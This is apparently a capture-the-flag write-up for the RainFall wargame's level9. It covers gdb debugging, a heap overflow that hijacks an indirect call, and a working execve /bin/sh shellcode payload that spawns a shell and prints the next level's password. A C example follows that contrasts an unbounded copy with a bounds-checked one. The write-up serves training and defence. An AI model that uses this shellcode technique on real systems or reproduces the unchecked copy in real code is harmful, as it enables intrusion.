For the last level of the mandatory part there is a twist: the binary seems to be C++ code. We don't see any shell spawn or pass reading, so we are going to use a shellcode.

Let's try to make the program segfault with 'A's: it segfaults from 109 on. If we put 112 bytes in gdb, with 'B's at the end, we get this segfault:

```
(gdb) i r
eax            0x42424242	1111638594
ecx            0x42424242	1111638594
edx            0x804a07c	134520956
ebx            0x804a078	134520952
esp            0xbffff6a0	0xbffff6a0
ebp            0xbffff6c8	0xbffff6c8
esi            0x0	0
edi            0x0	0
eip            0x8048682	0x8048682
eflags         0x210287	[ CF PF SF IF RF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) x/i $eip
=> 0x8048682 : mov (%eax),%edx
(gdb)
```

Later in the code, we get this:

```
0x8048693 call *%edx
```

So `eax` is loaded from our string, the program reads a pointer from wherever `eax` points, and then calls it. That means we can put the target address we want to jump to at any point in the string, and put the address of that spot at bytes 109-112. We will target our shellcode with it.

```
level9@RainFall:~$ ./level9 `python -c "print('\x10\xa0\x04\x08'+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'A'*58+'\x0c\xa0\x04\x08')"`
$ whoami
bonus0
$ cat /home/user/bonus0/.pass
f3f0004b6f364cb5a4147e9ef827fa922a4861408845c26b6971ad770d906728
```

:)
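The root cause this level relies on is a fixed-size text buffer sitting in front of a pointer that the program later dereferences for an indirect call, filled by a copy that takes its length from the attacker's string rather than from the buffer. The writeup does not show the binary's source, so the following is an added example, not the level's code or anything from the RainFall project: the `struct note` layout, `ANNOTATION_LEN` and the function names are assumptions that mirror the pattern described above. It places the unbounded copy beside a checked version that rejects input which does not fit, and shows that only the checked version keeps the pointer field intact when handed an over-long string.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical object mirroring the pattern in the writeup: a fixed-size
 * text field followed by a pointer that is later used for an indirect call.
 * This layout is assumed for illustration; it is not the binary's source. */
#define ANNOTATION_LEN 100

struct note {
    char annotation[ANNOTATION_LEN];
    void (*handler)(void);  /* sits right after the buffer, like the overwritten pointer */
};

static void default_handler(void) { puts("default handler"); }

/* Constructed over-long input: exactly sizeof(struct note) bytes of 'A', so an
 * unbounded copy reaches the handler field while staying inside the object. */
const char *oversize_input(void)
{
    static char buf[sizeof(struct note) + 1];
    memset(buf, 'A', sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';
    return buf;
}

/* Vulnerable pattern: the copy length comes from the input, not the buffer,
 * so anything longer than ANNOTATION_LEN overwrites handler. The copy goes
 * through a byte pointer to the object so the demo stays within the object. */
void set_annotation_unchecked(struct note *n, const char *str)
{
    memcpy((unsigned char *)n + offsetof(struct note, annotation), str, strlen(str));
}

/* Hardened version: refuse input that does not fit together with its NUL,
 * so the copy can never reach the handler field. */
int set_annotation_checked(struct note *n, const char *str)
{
    size_t len = strlen(str);
    if (len >= ANNOTATION_LEN)
        return -1;  /* reject rather than silently truncate */
    memcpy(n->annotation, str, len + 1);
    return 0;
}

/* 1 if the handler pointer still refers to the expected function. */
int handler_intact(const struct note *n)
{
    return n->handler == default_handler;
}

/* Checked path on one string: 0 if it was stored verbatim with the handler
 * untouched, -1 if it was rejected or anything went wrong. */
int checked_roundtrip(const char *str)
{
    struct note n = { {0}, default_handler };
    if (set_annotation_checked(&n, str) != 0)
        return -1;
    return (handler_intact(&n) && strcmp(n.annotation, str) == 0) ? 0 : -1;
}

/* Runs both paths on the over-long input. Returns 1 when the unchecked copy
 * clobbered the pointer and the checked copy refused the input and kept it. */
int demo(void)
{
    struct note a = { {0}, default_handler };
    struct note b = { {0}, default_handler };

    set_annotation_unchecked(&a, oversize_input());
    int rc = set_annotation_checked(&b, oversize_input());

    return !handler_intact(&a) && rc == -1 && handler_intact(&b);
}

int main(void)
{
    printf("unchecked copy corrupts the pointer, checked copy does not: %s\n",
           demo() ? "yes" : "no");
    return 0;
}
```

The bound in `set_annotation_checked` is on the destination field, which is the property the original copy lacked; in the real binary the same check would have prevented the second object's pointer from ever being reachable from the first object's annotation. Note the demo only ever writes inside `sizeof(struct note)` bytes so that it stays well-defined C while still showing the pointer being overwritten.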